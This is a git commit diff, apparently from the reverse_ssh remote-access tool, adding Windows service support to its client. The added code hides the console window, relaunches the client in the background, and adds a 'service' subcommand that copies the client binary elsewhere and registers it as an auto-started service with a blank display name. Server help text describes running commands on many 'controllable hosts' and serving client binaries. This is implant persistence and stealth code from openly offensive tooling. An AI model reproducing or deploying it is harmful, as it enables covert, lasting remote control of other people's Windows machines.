Add untested starting work for windows service compatiablity

NHAS · NHAS · commit 99b3a85e75e3 · 2022-06-08T23:12:19.000+12:00
diff --git a/cmd/client/detach_windows.go b/cmd/client/detach_windows.go
@@ -3,34 +3,117 @@
 package main
 
 import (
+	"fmt"
 	"log"
 	"os"
 	"os/exec"
 	"syscall"
+	"time"
 
 	"github.com/NHAS/reverse_ssh/internal/client"
+	"golang.org/x/sys/windows/svc"
+	"golang.org/x/sys/windows/svc/debug"
+	"golang.org/x/sys/windows/svc/eventlog"
 )
 
 func Fork(destination, fingerprint, proxyaddress string) error {
-	log.Println("Forking")
 
-	modkernel32 := syscall.NewLazyDLL("kernel32.dll")
-	procAttachConsole := modkernel32.NewProc("FreeConsole")
-	syscall.Syscall(procAttachConsole.Addr(), 0, 0, 0, 0)
+	inService, err := svc.IsWindowsService()
+	if err != nil {
+		log.Fatalf("failed to determine if we are running in service: %v", err)
+	}
+
+	if !inService {
+
+		log.Println("Forking")
+
+		modkernel32 := syscall.NewLazyDLL("kernel32.dll")
+		procAttachConsole := modkernel32.NewProc("FreeConsole")
+		syscall.Syscall(procAttachConsole.Addr(), 0, 0, 0, 0)
 
-	path, _ := os.Executable()
+		path, _ := os.Executable()
 
-	cmd := exec.Command(path, append([]string{"--foreground"}, os.Args[1:]...)...)
-	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
-	err := cmd.Start()
+		cmd := exec.Command(path, append([]string{"--foreground"}, os.Args[1:]...)...)
+		cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
+		err = cmd.Start()
 
-	if cmd.Process != nil {
-		cmd.Process.Release()
+		if cmd.Process != nil {
+			cmd.Process.Release()
+		}
+		return nil
 	}
 
+	runService("RSSH", destination, fingerprint, proxyaddress)
+
 	return err
 }
 
+var elog debug.Log
+
+type rsshService struct {
+	Dest, Fingerprint, Proxy string
+}
+
+func runService(name, destination, fingerprint, proxyaddress string) {
+	var err error
+
+	elog, err := eventlog.Open(name)
+	if err != nil {
+		return
+	}
+
+	defer elog.Close()
+
+	elog.Info(1, fmt.Sprintf("starting %s service", name))
+	err = svc.Run(name, &rsshService{
+		destination,
+		fingerprint,
+		proxyaddress,
+	})
+	if err != nil {
+		elog.Error(1, fmt.Sprintf("%s service failed: %v", name, err))
+		return
+	}
+	elog.Info(1, fmt.Sprintf("%s service stopped", name))
+}
+
+func (m *rsshService) Execute(args []string, r <-chan svc.ChangeRequest, changes chan<- svc.Status) (ssec bool, errno uint32) {
+	const cmdsAccepted = svc.AcceptStop | svc.AcceptShutdown
+	changes <- svc.Status{State: svc.StartPending}
+	go Run(m.Dest, m.Fingerprint, m.Proxy)
+	changes <- svc.Status{State: svc.Running, Accepts: cmdsAccepted}
+
+	for c := range r {
+		switch c.Cmd {
+		case svc.Interrogate:
+			changes <- c.CurrentStatus
+			// Testing deadlock from https://code.google.com/p/winsvc/issues/detail?id=4
+			time.Sleep(100 * time.Millisecond)
+			changes <- c.CurrentStatus
+		case svc.Stop, svc.Shutdown:
+			break
+		default:
+			elog.Error(1, fmt.Sprintf("unexpected control request #%d", c))
+		}
+	}
+
+	changes <- svc.Status{State: svc.StopPending}
+	return
+}
+
 func Run(destination, fingerprint, proxyaddress string) {
-	client.Run(destination, fingerprint, proxyaddress)
+
+	inService, err := svc.IsWindowsService()
+	if err != nil {
+		log.Fatalf("failed to determine if we are running in service: %v", err)
+	}
+
+	if !inService {
+
+		client.Run(destination, fingerprint, proxyaddress)
+		return
+	}
+
+	runService("rssh", destination, fingerprint, proxyaddress)
+
 }
diff --git a/go.mod b/go.mod
@@ -7,7 +7,7 @@ require (
 	github.com/creack/pty v1.1.17
 	github.com/shirou/gopsutil v3.21.11+incompatible
 	golang.org/x/crypto v0.0.0-20220214200702-86341886e292
-	golang.org/x/sys v0.0.0-20220227234510-4e6760a101f9
+	golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a
 )
 
 require (
diff --git a/go.sum b/go.sum
@@ -40,6 +40,8 @@ golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBc
 golang.org/x/sys v0.0.0-20220128215802-99c3d69c2c27/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/sys v0.0.0-20220227234510-4e6760a101f9 h1:nhht2DYV/Sn3qOayu8lM+cU1ii9sTLUeBQwQQfUHtrs=
 golang.org/x/sys v0.0.0-20220227234510-4e6760a101f9/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a h1:dGzPydgVsqGcTRVwiLJ1jVbufYwmzD3LfVPLKsKg+0k=
+golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
 golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
diff --git a/internal/client/handlers/subsystems/init_windows.go b/internal/client/handlers/subsystems/init_windows.go
@@ -1 +1,8 @@
+//go:build windows
+
 package subsystems
+
+//Enable service install
+func init() {
+	subsystems["service"] = new(service)
+}
diff --git a/internal/client/handlers/subsystems/service.go b/internal/client/handlers/subsystems/service.go
@@ -0,0 +1,110 @@
+//go:build windows
+
+package subsystems
+
+import (
+	"errors"
+	"fmt"
+	"io/ioutil"
+	"os"
+
+	"github.com/NHAS/reverse_ssh/internal/terminal"
+	"golang.org/x/crypto/ssh"
+	"golang.org/x/sys/windows/svc/eventlog"
+	"golang.org/x/sys/windows/svc/mgr"
+)
+
+type service bool
+
+func (s *service) Execute(line terminal.ParsedLine, connection ssh.Channel, subsystemReq *ssh.Request) error {
+	subsystemReq.Reply(true, nil)
+
+	arg, err := line.GetArgString("install")
+	if err != terminal.ErrFlagNotSet {
+		if err != nil {
+			return err
+		}
+		return s.installService("rssh", arg)
+	}
+
+	arg, err = line.GetArgString("uninstall")
+	if err != terminal.ErrFlagNotSet {
+		if err != nil {
+			return err
+		}
+
+		return s.uninstallService(arg)
+	}
+
+	return errors.New(terminal.MakeHelpText(
+		"service [MODE] [ARGS|...]",
+		"The service submodule can install or removed the rssh binary as a service",
+		"\t--install\tTakes 1 argument, a location to copy the rssh binary to. E.g service --install rssh C:\\path\\here\\rssh.exe",
+		"\t--uninstall\tTakes 1 argument, the name of a service to remove. Will not check if this is the rssh service",
+	))
+}
+
+func (s *service) installService(name, location string) error {
+
+	currentPath, err := os.Executable()
+	if err != nil {
+		return errors.New("Unable to find the current binary location: " + err.Error())
+	}
+
+	input, err := ioutil.ReadFile(currentPath)
+	if err != nil {
+		return err
+	}
+
+	err = ioutil.WriteFile(location, input, 0644)
+	if err != nil {
+		return err
+	}
+
+	m, err := mgr.Connect()
+	if err != nil {
+		return err
+	}
+	defer m.Disconnect()
+
+	newService, err := m.OpenService(name)
+	if err == nil {
+		newService.Close()
+		return fmt.Errorf("service %s already exists", name)
+	}
+	newService, err = m.CreateService(name, location, mgr.Config{DisplayName: ""}, "is", "auto-started")
+	if err != nil {
+		return err
+	}
+	defer newService.Close()
+	err = eventlog.InstallAsEventCreate(name, eventlog.Error|eventlog.Warning|eventlog.Info)
+	if err != nil {
+		newService.Delete()
+		return fmt.Errorf("SetupEventLogSource() failed: %s", err)
+	}
+	return nil
+
+}
+
+func (s *service) uninstallService(name string) error {
+	m, err := mgr.Connect()
+	if err != nil {
+		return err
+	}
+	defer m.Disconnect()
+	serviceToRemove, err := m.OpenService(name)
+	if err != nil {
+		return fmt.Errorf("service %s is not installed", name)
+	}
+	defer serviceToRemove.Close()
+	err = serviceToRemove.Delete()
+	if err != nil {
+		return err
+	}
+	err = eventlog.Remove(name)
+	if err != nil {
+		return fmt.Errorf("RemoveEventLogSource() failed: %s", err)
+	}
+	return nil
+
+}
diff --git a/internal/server/commands/connect.go b/internal/server/commands/connect.go
@@ -77,7 +77,7 @@ func (c *connect) Help(explain bool) string {
 		return "Start shell on remote controllable host."
 	}
 
-	return makeHelpText(
+	return terminal.MakeHelpText(
 		"connect " + autocomplete.RemoteId,
 	)
 }
diff --git a/internal/server/commands/exec.go b/internal/server/commands/exec.go
@@ -124,7 +124,7 @@ func (e *exec) Help(explain bool) string {
 		return "Execute a command on one or more rssh client"
 	}
 
-	return makeHelpText(
+	return terminal.MakeHelpText(
 		"exec [OPTIONS] filter|host command",
 		"Filter uses glob matching against all attributes of a target (hostname, ip, id), allowing you to run a command against multiple machines",
 		"\t-q\tQuiet, no output (will also remove confirmation prompt)",
diff --git a/internal/server/commands/help.go b/internal/server/commands/help.go
@@ -66,7 +66,7 @@ func (h *help) Help(explain bool) string {
 		return "Get help for commands, or display all commands"
 	}
 
-	return makeHelpText(
+	return terminal.MakeHelpText(
 		"help",
 		"help <functions>",
 	)
diff --git a/internal/server/commands/kill.go b/internal/server/commands/kill.go
@@ -54,7 +54,7 @@ func (k *kill) Help(explain bool) string {
 		return "End a remote controllable host instance."
 	}
 
-	return makeHelpText(
+	return terminal.MakeHelpText(
 		"kill <remote_id>",
 		"kill <glob pattern>",
 	)
diff --git a/internal/server/commands/link.go b/internal/server/commands/link.go
@@ -150,7 +150,7 @@ func (e *link) Help(explain bool) string {
 		return "Generate client binary and return link to it"
 	}
 
-	return makeHelpText(
+	return terminal.MakeHelpText(
 		"link [OPTIONS]",
 		"Link will compile a client and serve the resulting binary on a link which is returned.",
 		"This requires the web server component has been enabled.",
diff --git a/internal/server/commands/list.go b/internal/server/commands/list.go
@@ -107,7 +107,7 @@ func (l *list) Help(explain bool) string {
 		return "List connected controllable hosts."
 	}
 
-	return makeHelpText(
+	return terminal.MakeHelpText(
 		"ls [OPTION] [FILTER]",
 		"Filter uses glob matching against all attributes of a target (hostname, ip, id)",
 		"\t-t\tPrint all attributes in pretty table",
diff --git a/internal/server/commands/util.go b/internal/server/commands/util.go
diff --git a/internal/server/commands/who.go b/internal/server/commands/who.go
@@ -31,5 +31,5 @@ func (w *who) Help(explain bool) string {
 		return "List users connected to the RSSH server"
 	}
 
-	return makeHelpText("who")
+	return terminal.MakeHelpText("who")
 }
diff --git a/internal/terminal/utils.go b/internal/terminal/utils.go
@@ -336,3 +336,11 @@ func ParseLine(line string, cursorPosition int) (pl ParsedLine) {
 	return
 
 }
+
+func MakeHelpText(lines ...string) (s string) {
+	for _, v := range lines {
+		s += v + "\n"
+	}
+
+	return s
+}

Original file line number	Diff line number	Diff line change
`@@ -7,7 +7,7 @@ require (`
`7`	`7`	`github.com/creack/pty v1.1.17`
`8`	`8`	`github.com/shirou/gopsutil v3.21.11+incompatible`
`9`	`9`	`golang.org/x/crypto v0.0.0-20220214200702-86341886e292`
`10`		`- golang.org/x/sys v0.0.0-20220227234510-4e6760a101f9`
	`10`	`+ golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a`
`11`	`11`	`)`
`12`	`12`
`13`	`13`	`require (`
Original file line number	Diff line number	Diff line change
`@@ -77,7 +77,7 @@ func (c *connect) Help(explain bool) string {`
`77`	`77`	`return "Start shell on remote controllable host."`
`78`	`78`	`}`
`79`	`79`
`80`		`- return makeHelpText(`
	`80`	`+ return terminal.MakeHelpText(`
`81`	`81`	`"connect " + autocomplete.RemoteId,`
`82`	`82`	`)`
`83`	`83`	`}`
Original file line number	Diff line number	Diff line change
`@@ -124,7 +124,7 @@ func (e *exec) Help(explain bool) string {`
`124`	`124`	`return "Execute a command on one or more rssh client"`
`125`	`125`	`}`
`126`	`126`
`127`		`- return makeHelpText(`
	`127`	`+ return terminal.MakeHelpText(`
`128`	`128`	`"exec [OPTIONS] filter\|host command",`
`129`	`129`	`"Filter uses glob matching against all attributes of a target (hostname, ip, id), allowing you to run a command against multiple machines",`
`130`	`130`	`"\t-q\tQuiet, no output (will also remove confirmation prompt)",`
Original file line number	Diff line number	Diff line change
`@@ -66,7 +66,7 @@ func (h *help) Help(explain bool) string {`
`66`	`66`	`return "Get help for commands, or display all commands"`
`67`	`67`	`}`
`68`	`68`
`69`		`- return makeHelpText(`
	`69`	`+ return terminal.MakeHelpText(`
`70`	`70`	`"help",`
`71`	`71`	`"help <functions>",`
`72`	`72`	`)`
Original file line number	Diff line number	Diff line change
`@@ -54,7 +54,7 @@ func (k *kill) Help(explain bool) string {`
`54`	`54`	`return "End a remote controllable host instance."`
`55`	`55`	`}`
`56`	`56`
`57`		`- return makeHelpText(`
	`57`	`+ return terminal.MakeHelpText(`
`58`	`58`	`"kill <remote_id>",`
`59`	`59`	`"kill <glob pattern>",`
`60`	`60`	`)`
Original file line number	Diff line number	Diff line change
`@@ -150,7 +150,7 @@ func (e *link) Help(explain bool) string {`
`150`	`150`	`return "Generate client binary and return link to it"`
`151`	`151`	`}`
`152`	`152`
`153`		`- return makeHelpText(`
	`153`	`+ return terminal.MakeHelpText(`
`154`	`154`	`"link [OPTIONS]",`
`155`	`155`	`"Link will compile a client and serve the resulting binary on a link which is returned.",`
`156`	`156`	`"This requires the web server component has been enabled.",`
Original file line number	Diff line number	Diff line change
`@@ -107,7 +107,7 @@ func (l *list) Help(explain bool) string {`
`107`	`107`	`return "List connected controllable hosts."`
`108`	`108`	`}`
`109`	`109`
`110`		`- return makeHelpText(`
	`110`	`+ return terminal.MakeHelpText(`
`111`	`111`	`"ls [OPTION] [FILTER]",`
`112`	`112`	`"Filter uses glob matching against all attributes of a target (hostname, ip, id)",`
`113`	`113`	`"\t-t\tPrint all attributes in pretty table",`
Original file line number	Diff line number	Diff line change
`@@ -31,5 +31,5 @@ func (w *who) Help(explain bool) string {`
`31`	`31`	`return "List users connected to the RSSH server"`
`32`	`32`	`}`
`33`	`33`
`34`		`- return makeHelpText("who")`
	`34`	`+ return terminal.MakeHelpText("who")`
`35`	`35`	`}`